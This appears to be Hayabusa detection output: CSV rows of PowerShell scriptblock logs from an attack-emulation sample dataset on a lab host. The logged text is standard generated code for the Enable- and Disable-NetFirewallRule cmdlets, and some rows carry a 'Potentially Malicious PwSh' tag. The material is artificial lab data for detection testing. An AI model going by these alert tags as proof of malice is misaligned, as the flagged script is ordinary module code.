[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance]",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"face', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetFirewallRule' -Alias '*' function Disable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance]",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains 